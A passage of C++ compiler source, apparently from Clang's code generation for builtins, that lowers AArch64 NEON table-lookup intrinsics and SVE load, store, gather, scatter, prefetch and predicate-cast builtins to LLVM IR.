ReturnValueSlot ReturnValue,
llvm::Triple::ArchType Arch) {
switch (BuiltinID) {
default:
return nullptr;
#include "clang/Basic/arm_cde_builtin_cg.inc"
}
}
static Value *EmitAArch64TblBuiltinExpr(CodeGenFunction &CGF, unsigned BuiltinID,
const CallExpr *E,
SmallVectorImpl<Value *> &Ops,
llvm::Triple::ArchType Arch) {
unsigned int Int = 0;
const char *s = nullptr;
switch (BuiltinID) {
default:
return nullptr;
case NEON::BI__builtin_neon_vtbl1_v:
case NEON::BI__builtin_neon_vqtbl1_v:
case NEON::BI__builtin_neon_vqtbl1q_v:
case NEON::BI__builtin_neon_vtbl2_v:
case NEON::BI__builtin_neon_vqtbl2_v:
case NEON::BI__builtin_neon_vqtbl2q_v:
case NEON::BI__builtin_neon_vtbl3_v:
case NEON::BI__builtin_neon_vqtbl3_v:
case NEON::BI__builtin_neon_vqtbl3q_v:
case NEON::BI__builtin_neon_vtbl4_v:
case NEON::BI__builtin_neon_vqtbl4_v:
case NEON::BI__builtin_neon_vqtbl4q_v:
break;
case NEON::BI__builtin_neon_vtbx1_v:
case NEON::BI__builtin_neon_vqtbx1_v:
case NEON::BI__builtin_neon_vqtbx1q_v:
case NEON::BI__builtin_neon_vtbx2_v:
case NEON::BI__builtin_neon_vqtbx2_v:
case NEON::BI__builtin_neon_vqtbx2q_v:
case NEON::BI__builtin_neon_vtbx3_v:
case NEON::BI__builtin_neon_vqtbx3_v:
case NEON::BI__builtin_neon_vqtbx3q_v:
case NEON::BI__builtin_neon_vtbx4_v:
case NEON::BI__builtin_neon_vqtbx4_v:
case NEON::BI__builtin_neon_vqtbx4q_v:
break;
}
assert(E->getNumArgs() >= 3);
// Get the last argument, which specifies the vector type.
const Expr *Arg = E->getArg(E->getNumArgs() - 1);
Optional<llvm::APSInt> Result = Arg->getIntegerConstantExpr(CGF.getContext());
if (!Result)
return nullptr;
// Determine the type of this overloaded NEON intrinsic.
NeonTypeFlags Type = Result->getZExtValue();
llvm::FixedVectorType *Ty = GetNeonType(&CGF, Type);
if (!Ty)
return nullptr;
CodeGen::CGBuilderTy &Builder = CGF.Builder;
// AArch64 scalar builtins are not overloaded: they do not have an extra
// argument that specifies the vector type, so we need to handle each case.
switch (BuiltinID) {
case NEON::BI__builtin_neon_vtbl1_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 1), nullptr,
Ops[1], Ty, Intrinsic::aarch64_neon_tbl1,
"vtbl1");
}
case NEON::BI__builtin_neon_vtbl2_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 2), nullptr,
Ops[2], Ty, Intrinsic::aarch64_neon_tbl1,
"vtbl1");
}
case NEON::BI__builtin_neon_vtbl3_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 3), nullptr,
Ops[3], Ty, Intrinsic::aarch64_neon_tbl2,
"vtbl2");
}
case NEON::BI__builtin_neon_vtbl4_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(0, 4), nullptr,
Ops[4], Ty, Intrinsic::aarch64_neon_tbl2,
"vtbl2");
}
case NEON::BI__builtin_neon_vtbx1_v: {
Value *TblRes =
packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 1), nullptr, Ops[2],
Ty, Intrinsic::aarch64_neon_tbl1, "vtbl1");
llvm::Constant *EightV = ConstantInt::get(Ty, 8);
Value *CmpRes = Builder.CreateICmp(ICmpInst::ICMP_UGE, Ops[2], EightV);
CmpRes = Builder.CreateSExt(CmpRes, Ty);
Value *EltsFromInput = Builder.CreateAnd(CmpRes, Ops[0]);
Value *EltsFromTbl = Builder.CreateAnd(Builder.CreateNot(CmpRes), TblRes);
return Builder.CreateOr(EltsFromInput, EltsFromTbl, "vtbx");
}
case NEON::BI__builtin_neon_vtbx2_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 2), Ops[0],
Ops[3], Ty, Intrinsic::aarch64_neon_tbx1,
"vtbx1");
}
case NEON::BI__builtin_neon_vtbx3_v: {
Value *TblRes =
packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 3), nullptr, Ops[4],
Ty, Intrinsic::aarch64_neon_tbl2, "vtbl2");
llvm::Constant *TwentyFourV = ConstantInt::get(Ty, 24);
Value *CmpRes = Builder.CreateICmp(ICmpInst::ICMP_UGE, Ops[4],
TwentyFourV);
CmpRes = Builder.CreateSExt(CmpRes, Ty);
Value *EltsFromInput = Builder.CreateAnd(CmpRes, Ops[0]);
Value *EltsFromTbl = Builder.CreateAnd(Builder.CreateNot(CmpRes), TblRes);
return Builder.CreateOr(EltsFromInput, EltsFromTbl, "vtbx");
}
case NEON::BI__builtin_neon_vtbx4_v: {
return packTBLDVectorList(CGF, makeArrayRef(Ops).slice(1, 4), Ops[0],
Ops[5], Ty, Intrinsic::aarch64_neon_tbx2,
"vtbx2");
}
case NEON::BI__builtin_neon_vqtbl1_v:
case NEON::BI__builtin_neon_vqtbl1q_v:
Int = Intrinsic::aarch64_neon_tbl1; s = "vtbl1"; break;
case NEON::BI__builtin_neon_vqtbl2_v:
case NEON::BI__builtin_neon_vqtbl2q_v:
Int = Intrinsic::aarch64_neon_tbl2; s = "vtbl2"; break;
case NEON::BI__builtin_neon_vqtbl3_v:
case NEON::BI__builtin_neon_vqtbl3q_v:
Int = Intrinsic::aarch64_neon_tbl3; s = "vtbl3"; break;
case NEON::BI__builtin_neon_vqtbl4_v:
case NEON::BI__builtin_neon_vqtbl4q_v:
Int = Intrinsic::aarch64_neon_tbl4; s = "vtbl4"; break;
case NEON::BI__builtin_neon_vqtbx1_v:
case NEON::BI__builtin_neon_vqtbx1q_v:
Int = Intrinsic::aarch64_neon_tbx1; s = "vtbx1"; break;
case NEON::BI__builtin_neon_vqtbx2_v:
case NEON::BI__builtin_neon_vqtbx2q_v:
Int = Intrinsic::aarch64_neon_tbx2; s = "vtbx2"; break;
case NEON::BI__builtin_neon_vqtbx3_v:
case NEON::BI__builtin_neon_vqtbx3q_v:
Int = Intrinsic::aarch64_neon_tbx3; s = "vtbx3"; break;
case NEON::BI__builtin_neon_vqtbx4_v:
case NEON::BI__builtin_neon_vqtbx4q_v:
Int = Intrinsic::aarch64_neon_tbx4; s = "vtbx4"; break;
}
if (!Int)
return nullptr;
Function *F = CGF.CGM.getIntrinsic(Int, Ty);
return CGF.EmitNeonCall(F, Ops, s);
}
Value *CodeGenFunction::vectorWrapScalar16(Value *Op) {
auto *VTy = llvm::FixedVectorType::get(Int16Ty, 4);
Op = Builder.CreateBitCast(Op, Int16Ty);
Value *V = UndefValue::get(VTy);
llvm::Constant *CI = ConstantInt::get(SizeTy, 0);
Op = Builder.CreateInsertElement(V, Op, CI);
return Op;
}
/// SVEBuiltinMemEltTy - Returns the memory element type for this memory
/// access builtin. Only required if it can't be inferred from the base pointer
/// operand.
llvm::Type *CodeGenFunction::SVEBuiltinMemEltTy(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getMemEltType()) {
case SVETypeFlags::MemEltTyDefault:
return getEltType(TypeFlags);
case SVETypeFlags::MemEltTyInt8:
return Builder.getInt8Ty();
case SVETypeFlags::MemEltTyInt16:
return Builder.getInt16Ty();
case SVETypeFlags::MemEltTyInt32:
return Builder.getInt32Ty();
case SVETypeFlags::MemEltTyInt64:
return Builder.getInt64Ty();
}
llvm_unreachable("Unknown MemEltType");
}
llvm::Type *CodeGenFunction::getEltType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default:
llvm_unreachable("Invalid SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return Builder.getInt8Ty();
case SVETypeFlags::EltTyInt16:
return Builder.getInt16Ty();
case SVETypeFlags::EltTyInt32:
return Builder.getInt32Ty();
case SVETypeFlags::EltTyInt64:
return Builder.getInt64Ty();
case SVETypeFlags::EltTyFloat16:
return Builder.getHalfTy();
case SVETypeFlags::EltTyFloat32:
return Builder.getFloatTy();
case SVETypeFlags::EltTyFloat64:
return Builder.getDoubleTy();
case SVETypeFlags::EltTyBFloat16:
return Builder.getBFloatTy();
case SVETypeFlags::EltTyBool8:
case SVETypeFlags::EltTyBool16:
case SVETypeFlags::EltTyBool32:
case SVETypeFlags::EltTyBool64:
return Builder.getInt1Ty();
}
}
// Return the llvm predicate vector type corresponding to the specified element
// TypeFlags.
llvm::ScalableVectorType *
CodeGenFunction::getSVEPredType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default: llvm_unreachable("Unhandled SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyInt16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyInt32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyInt64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
case SVETypeFlags::EltTyBFloat16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyFloat16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyFloat32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyFloat64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
case SVETypeFlags::EltTyBool8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyBool16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyBool32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyBool64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
}
}
// Return the llvm vector type corresponding to the element type specified by
// TypeFlags.
llvm::ScalableVectorType *
CodeGenFunction::getSVEType(const SVETypeFlags &TypeFlags) {
switch (TypeFlags.getEltType()) {
default:
llvm_unreachable("Invalid SVETypeFlag!");
case SVETypeFlags::EltTyInt8:
return llvm::ScalableVectorType::get(Builder.getInt8Ty(), 16);
case SVETypeFlags::EltTyInt16:
return llvm::ScalableVectorType::get(Builder.getInt16Ty(), 8);
case SVETypeFlags::EltTyInt32:
return llvm::ScalableVectorType::get(Builder.getInt32Ty(), 4);
case SVETypeFlags::EltTyInt64:
return llvm::ScalableVectorType::get(Builder.getInt64Ty(), 2);
case SVETypeFlags::EltTyFloat16:
return llvm::ScalableVectorType::get(Builder.getHalfTy(), 8);
case SVETypeFlags::EltTyBFloat16:
return llvm::ScalableVectorType::get(Builder.getBFloatTy(), 8);
case SVETypeFlags::EltTyFloat32:
return llvm::ScalableVectorType::get(Builder.getFloatTy(), 4);
case SVETypeFlags::EltTyFloat64:
return llvm::ScalableVectorType::get(Builder.getDoubleTy(), 2);
case SVETypeFlags::EltTyBool8:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 16);
case SVETypeFlags::EltTyBool16:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 8);
case SVETypeFlags::EltTyBool32:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 4);
case SVETypeFlags::EltTyBool64:
return llvm::ScalableVectorType::get(Builder.getInt1Ty(), 2);
}
}
llvm::Value *
CodeGenFunction::EmitSVEAllTruePred(const SVETypeFlags &TypeFlags) {
Function *Ptrue =
CGM.getIntrinsic(Intrinsic::aarch64_sve_ptrue, getSVEPredType(TypeFlags));
return Builder.CreateCall(Ptrue, {Builder.getInt32(/*SV_ALL*/ 31)});
}
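// An SVE vector register is a multiple of 128 bits wide, so scalable vector
// types are expressed in units of this 128-bit granule.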
constexpr unsigned SVEBitsPerBlock = 128;
static llvm::ScalableVectorType *getSVEVectorForElementType(llvm::Type *EltTy) {
unsigned NumElts = SVEBitsPerBlock / EltTy->getScalarSizeInBits();
return llvm::ScalableVectorType::get(EltTy, NumElts);
}
// Reinterpret the input predicate so that it can be used to correctly isolate
// the elements of the specified datatype.
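// For example (illustrative): a svbool_t predicate arrives as <n x 16 x i1>;
// when the data is <n x 2 x i64> it is narrowed to <n x 2 x i1> via
// aarch64.sve.convert.from.svbool, and widened back via convert.to.svbool.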
Value *CodeGenFunction::EmitSVEPredicateCast(Value *Pred,
llvm::ScalableVectorType *VTy) {
auto *RTy = llvm::VectorType::get(IntegerType::get(getLLVMContext(), 1), VTy);
if (Pred->getType() == RTy)
return Pred;
unsigned IntID;
llvm::Type *IntrinsicTy;
switch (VTy->getMinNumElements()) {
default:
llvm_unreachable("unsupported element count!");
case 2:
case 4:
case 8:
IntID = Intrinsic::aarch64_sve_convert_from_svbool;
IntrinsicTy = RTy;
break;
case 16:
IntID = Intrinsic::aarch64_sve_convert_to_svbool;
IntrinsicTy = Pred->getType();
break;
}
Function *F = CGM.getIntrinsic(IntID, IntrinsicTy);
Value *C = Builder.CreateCall(F, Pred);
assert(C->getType() == RTy && "Unexpected return type!");
return C;
}
Value *CodeGenFunction::EmitSVEGatherLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
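// Illustrative example: svld1_gather_u64offset_f64(pg, base, offsets) takes
// the "scalar base, vector offset" path below, while
// svld1_gather_u64base_f64(pg, bases) takes the "vector base" path and has an
// implicit zero offset appended.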
auto *ResultTy = getSVEType(TypeFlags);
auto *OverloadedTy =
llvm::ScalableVectorType::get(SVEBuiltinMemEltTy(TypeFlags), ResultTy);
// At the ACLE level there's only one predicate type, svbool_t, which is
// mapped to <n x 16 x i1>. However, this might be incompatible with the
// actual type being loaded. For example, when loading doubles (64-bit
// elements) the predicate should be <n x 2 x i1> instead. At the IR level the
// type of the predicate and the data being loaded must match. Cast
// accordingly.
Ops[0] = EmitSVEPredicateCast(Ops[0], OverloadedTy);
Function *F = nullptr;
if (Ops[1]->getType()->isVectorTy())
// This is the "vector base, scalar offset" case. In order to uniquely
// map this built-in to an LLVM IR intrinsic, we need both the return type
// and the type of the vector base.
F = CGM.getIntrinsic(IntID, {OverloadedTy, Ops[1]->getType()});
else
// This is the "scalar base, vector offset" case. The type of the offset
// is encoded in the name of the intrinsic. We only need to specify the
// return type in order to uniquely map this built-in to an LLVM IR
// intrinsic.
F = CGM.getIntrinsic(IntID, OverloadedTy);
// Pass 0 when the offset is missing. This can only be applied when using
// the "vector base" addressing mode for which ACLE allows no offset. The
// corresponding LLVM IR always requires an offset.
if (Ops.size() == 2) {
assert(Ops[1]->getType()->isVectorTy() && "Scalar base requires an offset");
Ops.push_back(ConstantInt::get(Int64Ty, 0));
}
// For "vector base, scalar index" scale the index so that it becomes a
// scalar offset.
if (!TypeFlags.isByteIndexed() && Ops[1]->getType()->isVectorTy()) {
unsigned BytesPerElt =
OverloadedTy->getElementType()->getScalarSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
Ops[2] = Builder.CreateMul(Ops[2], Scale);
}
Value *Call = Builder.CreateCall(F, Ops);
// The following sext/zext is only needed when ResultTy != OverloadedTy. In
// other cases it's folded into a nop.
return TypeFlags.isZExtReturn() ? Builder.CreateZExt(Call, ResultTy)
: Builder.CreateSExt(Call, ResultTy);
}
Value *CodeGenFunction::EmitSVEScatterStore(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
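// Illustrative example: svst1_scatter_u64offset_f64(pg, base, offsets, data)
// takes the "scalar base, vector offset" path, with the data operand moved to
// the front as the LLVM intrinsic expects.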
auto *SrcDataTy = getSVEType(TypeFlags);
auto *OverloadedTy =
llvm::ScalableVectorType::get(SVEBuiltinMemEltTy(TypeFlags), SrcDataTy);
// In ACLE the source data is passed in the last argument, whereas in LLVM IR
// it's the first argument. Move it accordingly.
Ops.insert(Ops.begin(), Ops.pop_back_val());
Function *F = nullptr;
if (Ops[2]->getType()->isVectorTy())
// This is the "vector base, scalar offset" case. In order to uniquely
// map this built-in to an LLVM IR intrinsic, we need both the return type
// and the type of the vector base.
F = CGM.getIntrinsic(IntID, {OverloadedTy, Ops[2]->getType()});
else
// This is the "scalar base, vector offset" case. The type of the offset
// is encoded in the name of the intrinsic. We only need to specify the
// return type in order to uniquely map this built-in to an LLVM IR
// intrinsic.
F = CGM.getIntrinsic(IntID, OverloadedTy);
// Pass 0 when the offset is missing. This can only be applied when using
// the "vector base" addressing mode for which ACLE allows no offset. The
// corresponding LLVM IR always requires an offset.
if (Ops.size() == 3) {
assert(Ops[1]->getType()->isVectorTy() && "Scalar base requires an offset");
Ops.push_back(ConstantInt::get(Int64Ty, 0));
}
// Truncation is needed when SrcDataTy != OverloadedTy. In other cases it's
// folded into a nop.
Ops[0] = Builder.CreateTrunc(Ops[0], OverloadedTy);
// At the ACLE level there's only one predicate type, svbool_t, which is
// mapped to <n x 16 x i1>. However, this might be incompatible with the
// actual type being stored. For example, when storing doubles (64-bit
// elements) the predicate should be <n x 2 x i1> instead. At the IR level the
// type of the predicate and the data being stored must match. Cast
// accordingly.
Ops[1] = EmitSVEPredicateCast(Ops[1], OverloadedTy);
// For "vector base, scalar index" scale the index so that it becomes a
// scalar offset.
if (!TypeFlags.isByteIndexed() && Ops[2]->getType()->isVectorTy()) {
unsigned BytesPerElt =
OverloadedTy->getElementType()->getScalarSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
Ops[3] = Builder.CreateMul(Ops[3], Scale);
}
return Builder.CreateCall(F, Ops);
}
Value *CodeGenFunction::EmitSVEGatherPrefetch(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned IntID) {
// The gather prefetches are overloaded on the vector input - this can either
// be the vector of base addresses or the vector of offsets.
auto *OverloadedTy = dyn_cast<llvm::ScalableVectorType>(Ops[1]->getType());
if (!OverloadedTy)
OverloadedTy = cast<llvm::ScalableVectorType>(Ops[2]->getType());
// Cast the predicate from svbool_t to the right number of elements.
Ops[0] = EmitSVEPredicateCast(Ops[0], OverloadedTy);
// vector + imm addressing modes
if (Ops[1]->getType()->isVectorTy()) {
if (Ops.size() == 3) {
// Pass 0 for 'vector+imm' when the index is omitted.
Ops.push_back(ConstantInt::get(Int64Ty, 0));
// The sv_prfop is the last operand in the builtin and IR intrinsic.
std::swap(Ops[2], Ops[3]);
} else {
// Index needs to be passed as scaled offset.
llvm::Type *MemEltTy = SVEBuiltinMemEltTy(TypeFlags);
unsigned BytesPerElt = MemEltTy->getPrimitiveSizeInBits() / 8;
Value *Scale = ConstantInt::get(Int64Ty, BytesPerElt);
Ops[2] = Builder.CreateMul(Ops[2], Scale);
}
}
Function *F = CGM.getIntrinsic(IntID, OverloadedTy);
return Builder.CreateCall(F, Ops);
}
Value *CodeGenFunction::EmitSVEStructLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value*> &Ops,
unsigned IntID) {
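// Illustrative example: svld2_f64(pg, base) lowers to aarch64.sve.ld2, whose
// result is the two part vectors concatenated into a single vector of twice
// the element count.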
llvm::ScalableVectorType *VTy = getSVEType(TypeFlags);
auto VecPtrTy = llvm::PointerType::getUnqual(VTy);
auto EltPtrTy = llvm::PointerType::getUnqual(VTy->getElementType());
unsigned N;
switch (IntID) {
case Intrinsic::aarch64_sve_ld2:
N = 2;
break;
case Intrinsic::aarch64_sve_ld3:
N = 3;
break;
case Intrinsic::aarch64_sve_ld4:
N = 4;
break;
default:
llvm_unreachable("unknown intrinsic!");
}
auto RetTy = llvm::VectorType::get(VTy->getElementType(),
VTy->getElementCount() * N);
Value *Predicate = EmitSVEPredicateCast(Ops[0], VTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], VecPtrTy);
Value *Offset = Ops.size() > 2 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(VTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, EltPtrTy);
Function *F = CGM.getIntrinsic(IntID, {RetTy, Predicate->getType()});
return Builder.CreateCall(F, { Predicate, BasePtr });
}
Value *CodeGenFunction::EmitSVEStructStore(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value*> &Ops,
unsigned IntID) {
llvm::ScalableVectorType *VTy = getSVEType(TypeFlags);
auto VecPtrTy = llvm::PointerType::getUnqual(VTy);
auto EltPtrTy = llvm::PointerType::getUnqual(VTy->getElementType());
unsigned N;
switch (IntID) {
case Intrinsic::aarch64_sve_st2:
N = 2;
break;
case Intrinsic::aarch64_sve_st3:
N = 3;
break;
case Intrinsic::aarch64_sve_st4:
N = 4;
break;
default:
llvm_unreachable("unknown intrinsic!");
}
auto TupleTy =
llvm::VectorType::get(VTy->getElementType(), VTy->getElementCount() * N);
Value *Predicate = EmitSVEPredicateCast(Ops[0], VTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], VecPtrTy);
Value *Offset = Ops.size() > 3 ? Ops[2] : Builder.getInt32(0);
Value *Val = Ops.back();
BasePtr = Builder.CreateGEP(VTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, EltPtrTy);
// The llvm.aarch64.sve.st2/3/4 intrinsics take legal part vectors, so we
// need to break up the tuple vector.
SmallVector<llvm::Value*, 5> Operands;
Function *FExtr =
CGM.getIntrinsic(Intrinsic::aarch64_sve_tuple_get, {VTy, TupleTy});
for (unsigned I = 0; I < N; ++I)
Operands.push_back(Builder.CreateCall(FExtr, {Val, Builder.getInt32(I)}));
Operands.append({Predicate, BasePtr});
Function *F = CGM.getIntrinsic(IntID, { VTy });
return Builder.CreateCall(F, Operands);
}
// SVE2's svpmullb and svpmullt builtins are similar to the svpmullb_pair and
// svpmullt_pair intrinsics, with the exception that their results are bitcast
// to a wider type.
Value *CodeGenFunction::EmitSVEPMull(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
// Splat scalar operand to vector (intrinsics with _n infix)
if (TypeFlags.hasSplatOperand()) {
unsigned OpNo = TypeFlags.getSplatOperand();
Ops[OpNo] = EmitSVEDupX(Ops[OpNo]);
}
// The pair-wise function has a narrower overloaded type.
Function *F = CGM.getIntrinsic(BuiltinID, Ops[0]->getType());
Value *Call = Builder.CreateCall(F, {Ops[0], Ops[1]});
// Now bitcast to the wider result type.
llvm::ScalableVectorType *Ty = getSVEType(TypeFlags);
return EmitSVEReinterpret(Call, Ty);
}
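// svmovlb/svmovlt are widening moves; they are emitted as the corresponding
// shift-left-long intrinsic with a shift amount of zero.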
Value *CodeGenFunction::EmitSVEMovl(const SVETypeFlags &TypeFlags,
ArrayRef<Value *> Ops, unsigned BuiltinID) {
llvm::Type *OverloadedTy = getSVEType(TypeFlags);
Function *F = CGM.getIntrinsic(BuiltinID, OverloadedTy);
return Builder.CreateCall(F, {Ops[0], Builder.getInt32(0)});
}
Value *CodeGenFunction::EmitSVEPrefetchLoad(const SVETypeFlags &TypeFlags,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
auto *MemEltTy = SVEBuiltinMemEltTy(TypeFlags);
auto *VectorTy = getSVEVectorForElementType(MemEltTy);
auto *MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Ops[1];
// Apply the index operand if it was not omitted.
if (Ops.size() > 3) {
BasePtr = Builder.CreateBitCast(BasePtr, MemoryTy->getPointerTo());
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Ops[2]);
}
// Prefetch intrinsics always expect an i8*.
BasePtr = Builder.CreateBitCast(BasePtr, llvm::PointerType::getUnqual(Int8Ty));
Value *PrfOp = Ops.back();
Function *F = CGM.getIntrinsic(BuiltinID, Predicate->getType());
return Builder.CreateCall(F, {Predicate, BasePtr, PrfOp});
}
Value *CodeGenFunction::EmitSVEMaskedLoad(const CallExpr *E,
llvm::Type *ReturnTy,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID,
bool IsZExtReturn) {
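// Illustrative example: svld1sb_u64(pg, base) loads <n x 2 x i8> from memory
// and sign-extends it to the <n x 2 x i64> return type; svld1ub_u64 takes the
// zero-extending path instead.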
QualType LangPTy = E->getArg(1)->getType();
llvm::Type *MemEltTy = CGM.getTypes().ConvertType(
LangPTy->castAs<PointerType>()->getPointeeType());
// The vector type that is returned may be different from the
// eventual type loaded from memory.
auto VectorTy = cast<llvm::ScalableVectorType>(ReturnTy);
auto MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], MemoryTy->getPointerTo());
Value *Offset = Ops.size() > 2 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Offset);
BasePtr = Builder.CreateBitCast(BasePtr, MemEltTy->getPointerTo());
Function *F = CGM.getIntrinsic(BuiltinID, MemoryTy);
Value *Load = Builder.CreateCall(F, {Predicate, BasePtr});
return IsZExtReturn ? Builder.CreateZExt(Load, VectorTy)
: Builder.CreateSExt(Load, VectorTy);
}
Value *CodeGenFunction::EmitSVEMaskedStore(const CallExpr *E,
SmallVectorImpl<Value *> &Ops,
unsigned BuiltinID) {
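// Illustrative example: svst1b_s64(pg, base, data) truncates the
// <n x 2 x i64> data to <n x 2 x i8> before emitting the masked store.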
QualType LangPTy = E->getArg(1)->getType();
llvm::Type *MemEltTy = CGM.getTypes().ConvertType(
LangPTy->castAs<PointerType>()->getPointeeType());
// The vector type that is stored may be different from the
// eventual type stored to memory.
auto VectorTy = cast<llvm::ScalableVectorType>(Ops.back()->getType());
auto MemoryTy = llvm::ScalableVectorType::get(MemEltTy, VectorTy);
Value *Predicate = EmitSVEPredicateCast(Ops[0], MemoryTy);
Value *BasePtr = Builder.CreateBitCast(Ops[1], MemoryTy->getPointerTo());
Value *Offset = Ops.size() == 4 ? Ops[2] : Builder.getInt32(0);
BasePtr = Builder.CreateGEP(MemoryTy, BasePtr, Offset);
// Last value is always the data
llvm::Value *Val = Builder.CreateTrunc(Ops.back(), MemoryTy);
BasePtr = Builder.CreateBitCast(BasePtr, MemEltTy->getPointerTo());
Function *F = CGM.getIntrinsic(BuiltinID, MemoryTy);
return Builder.CreateCall(F, {Val, Predicate, BasePtr});
}
// Limit the usage of scalable llvm IR generated by the ACLE by using the
// sve dup.x intrinsic instead of IRBuilder::CreateVectorSplat.
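// For example (illustrative), svdup_n_s32(x) becomes a call to
// aarch64.sve.dup.x overloaded on <n x 4 x i32> rather than an
// insertelement/shufflevector splat sequence.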
Value *CodeGenFunction::EmitSVEDupX(Value *Scalar, llvm::Type *Ty) {
auto F = CGM.getIntrinsic(Intrinsic::aarch64_sve_dup_x, Ty);
return Builder.CreateCall(F, Scalar);
}
Value *CodeGenFunction::EmitSVEDupX(Value* Scalar) {
return EmitSVEDupX(Scalar, getSVEVectorForElementType(Scalar->getType()));
}
Value *CodeGenFunction::EmitSVEReinterpret(Value *Val, llvm::Type *Ty) {
// FIXME: For big endian this needs an additional REV, or needs a separate
// intrinsic that is code-generated as a no-op, because the LLVM bitcast
// instruction is defined as 'bitwise' equivalent from a memory point of
// view (when storing/reloading), whereas the svreinterpret builtin
// implements a bitwise-equivalent cast from a register point of view.
// LLVM CodeGen for a bitcast must add an explicit REV for big-endian.
return Builder.CreateBitCast(Val, Ty);
}
static void InsertExplicitZeroOperand(CGBuilderTy &Builder, llvm::Type *Ty,
SmallVectorImpl<Value *> &Ops) {
auto *SplatZero = Constant::getNullValue(Ty);
Ops.insert(Ops.begin(), SplatZero);
}
static void InsertExplicitUndefOperand(CGBuilderTy &Builder, llvm::Type *Ty,
SmallVectorImpl<Value *> &Ops) {
auto *SplatUndef = UndefValue::get(Ty);
Ops.insert(Ops.begin(), SplatUndef);
}
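// Compute the explicit overload types with which the LLVM intrinsic behind a
// builtin must be instantiated; which operand and result types participate
// depends on the builtin class encoded in TypeFlags.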
SmallVector<llvm::Type *, 2>
CodeGenFunction::getSVEOverloadTypes(const SVETypeFlags &TypeFlags,
llvm::Type *ResultType,
ArrayRef<Value *> Ops) {
if (TypeFlags.isOverloadNone())
return {};
llvm::Type *DefaultType = getSVEType(TypeFlags);
if (TypeFlags.isOverloadWhile())
return {DefaultType, Ops[1]->getType()};
if (TypeFlags.isOverloadWhileRW())
return {getSVEPredType(TypeFlags), Ops[0]->getType()};
if (TypeFlags.isOverloadCvt() || TypeFlags.isTupleSet())
return {Ops[0]->getType(), Ops.back()->getType()};
if (TypeFlags.isTupleCreate() || TypeFlags.isTupleGet())
return {ResultType, Ops[0]->getType()};
assert(TypeFlags.isOverloadDefault() && "Unexpected value for overloads");
return {DefaultType};
}
Value *CodeGenFunction::EmitAArch64SVEBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
// Find out if any arguments are required to be integer constant expressions.
unsigned ICEArguments = 0;
ASTContext::GetBuiltinTypeError Error;
getContext().GetBuiltinType(BuiltinID, Error, &ICEArguments);
assert(Error == ASTContext::GE_None && "Should not codegen an error");
llvm::Type *Ty = ConvertType(E->getType());
if (BuiltinID >= SVE::BI__builtin_sve_reinterpret_s8_s8 &&
BuiltinID <= SVE::BI__builtin_sve_reinterpret_f64_f64) {
Value *Val = EmitScalarExpr(E->getArg(0));
return EmitSVEReinterpret(Val, Ty);
}
llvm::SmallVector<Value *, 4> Ops;
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
if ((ICEArguments & (1 << i)) == 0)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
else {
// If this is required to be a constant, constant fold it so that we know
// that the generated intrinsic gets a ConstantInt.
Optional<llvm::APSInt> Result =
E->getArg(i)->getIntegerConstantExpr(getContext());
assert(Result && "Expected argument to be a constant");
// Immediates for SVE llvm intrinsics are always 32-bit. We can safely
